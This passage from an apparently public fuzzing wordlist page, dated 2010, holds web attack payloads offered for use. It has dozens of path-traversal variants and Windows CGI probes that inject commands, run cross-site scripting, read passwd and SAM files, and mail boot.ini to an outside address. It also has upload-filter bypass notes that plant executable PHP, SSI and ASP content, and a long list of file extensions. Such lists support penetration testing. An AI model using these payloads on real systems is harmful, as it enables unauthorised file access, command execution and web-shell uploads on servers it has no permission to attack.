\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..//{FILE}&lt;br /&gt;
..//..//{FILE}&lt;br /&gt;
..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..//..//..//..//..//..//..//..//{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
..///..///{FILE}&lt;br /&gt;
..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..///..///..///..///..///..///..///..///{FILE}&lt;br /&gt;
..\\{FILE}&lt;br /&gt;
..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}&lt;br /&gt;
./\/./{FILE}&lt;br /&gt;
./\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}&lt;br /&gt;
.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010 &lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHp-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
